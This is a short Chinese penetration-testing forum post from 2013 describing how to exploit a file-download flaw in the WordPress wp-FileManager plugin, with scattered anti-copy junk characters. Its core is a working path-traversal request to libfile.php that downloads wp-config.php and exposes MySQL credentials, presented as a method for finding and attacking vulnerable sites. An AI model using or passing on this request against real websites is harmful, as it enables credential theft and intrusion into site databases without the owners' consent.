中国网络渗透测试联盟
标题:
WordPress-wp-FileManager-File-Download漏洞利用方法
[打印本页]
作者:
admin
时间:
2013-7-26 12:43
标题:
WordPress-wp-FileManager-File-Download漏洞利用方法
洞详解:
http://packetstormsecurity.com/f ... -File-Download.html
) t( N7 j2 {+ ]8 I* z
( [% L7 r0 l! }! i, j1 Q
查找漏洞网站:访问/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download,下载wp-config,其中回显MySQL。
1 h7 z) Q! n& K+ L( u4 e2 P2 {. y
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2